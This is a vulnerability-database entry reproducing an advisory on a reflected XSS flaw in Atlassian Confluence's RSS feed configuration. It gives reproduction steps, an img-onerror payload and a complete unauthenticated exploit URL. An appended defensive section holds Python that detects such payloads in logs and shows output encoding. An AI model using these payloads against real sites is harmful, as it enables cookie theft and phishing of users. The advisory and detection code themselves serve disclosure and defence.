Atlassian Confluence 5.3 Cross Site Scripting

Vulnerability ID 1044627 Vulnerability type
Published 2013-08-07 Updated 2013-08-07
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2013080066
|Details
Vulnerability details not yet disclosed
|Exploit
Atlassian Confluence, the Enterprise Wiki - Reflected XSS

Details
==============================================================================
Product: Atlassian Confluence 3.5.6 through 5.3 (latest version), the Enterprise Wiki
Security-Risk: Critical
Remote-Exploit: yes
Vendor-URL: http://www.atlassian.com
Advisory-Status: Not Published

Credits
==============================================================================
Discovered by: Muhammad Waqar 

Affected Products:
==============================================================================
Atlassian Confluence, the Enterprise Wiki, from version 3.5.6 through the latest version, Atlassian Confluence 5.3


Description
==============================================================================
It's a wiki. You can use it to collaborate on writing and sharing content with your team.

More Details
==============================================================================
I have discovered a reflected cross-site scripting (XSS) vulnerability inside
Atlassian Confluence, the Enterprise Wiki.
The vulnerability can be easily exploited and can be used to steal cookies,
perform phishing attacks and various other attacks that compromise the security of a
user.

Proof of Concept
==============================================================================
Follow the steps below to reproduce:

Navigate to this link: http://www.example/dashboard/configurerssfeed.action

You now see the RSS feed creation options.

Select any options you want. You can see "Advanced Options"; click on it and put my XSS payload in the input fields, that is:
"><img src=x onerror=alert(9);>

Now click on "Create RSS Feed". It navigates to another page where you can see your injected JavaScript executed.


Exploit
==============================================================================
The created feed URL can be used anywhere and does not require any sort of authentication, so it can easily be used for cookie stealing and other attacks.

http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment&types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys=&sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed

Note: This exploit works in Firefox/Opera.

Solution
==============================================================================
User-supplied input is not properly sanitized when it is posted back into the page, so it should be sanitized (output-encoded) before being rendered.
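As an added defensive illustration (not part of the advisory): the detection logic below parses constructed access-log lines, percent-decodes the `title` and `labelString` parameters of requests to `doconfigurerssfeed.action` as in the exploit URL above, and flags values that contain markup; the two render functions are a hypothetical stand-in for the page that echoes the feed title, shown unescaped and then HTML-encoded as the solution describes.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory); the second one
# carries the advisory's payload in the title parameter, the others are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Aug/2013:10:01:02 +0000] "GET /dashboard/doconfigurerssfeed.action?types=page&title=Team+news&labelString=ops HTTP/1.1" 200 5120
10.0.0.9 - - [07/Aug/2013:10:02:15 +0000] "GET /dashboard/doconfigurerssfeed.action?types=page&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=x HTTP/1.1" 200 5200
10.0.0.7 - - [07/Aug/2013:10:03:30 +0000] "GET /dashboard/configurerssfeed.action HTTP/1.1" 200 3100
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
WATCHED_PARAMS = ("title", "labelString")
# Tag delimiters, attribute quotes or an on*= handler have no place in a feed title.
SUSPICIOUS = re.compile(r'[<>"]|on\w+\s*=', re.IGNORECASE)


def flag_feed_requests(log_text: str) -> list:
    """Return one finding per feed-builder request whose watched parameters contain markup."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/doconfigurerssfeed.action"):
            continue
        params = parse_qs(url.query)  # percent-decodes and collects repeated keys
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                if SUSPICIOUS.search(value):
                    findings.append({"param": name, "value": value, "line": line})
    return findings


def render_title_unsafe(title: str) -> str:
    """Hypothetical stand-in for a page that echoes the feed title verbatim (the bug's shape)."""
    return f'<input name="title" value="{title}">'


def render_title_safe(title: str) -> str:
    """Same markup with the value HTML-encoded before output, which is the fix the advisory asks for."""
    return f'<input name="title" value="{html.escape(title, quote=True)}">'
```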


-- 
Regards,
Muhammad Waqar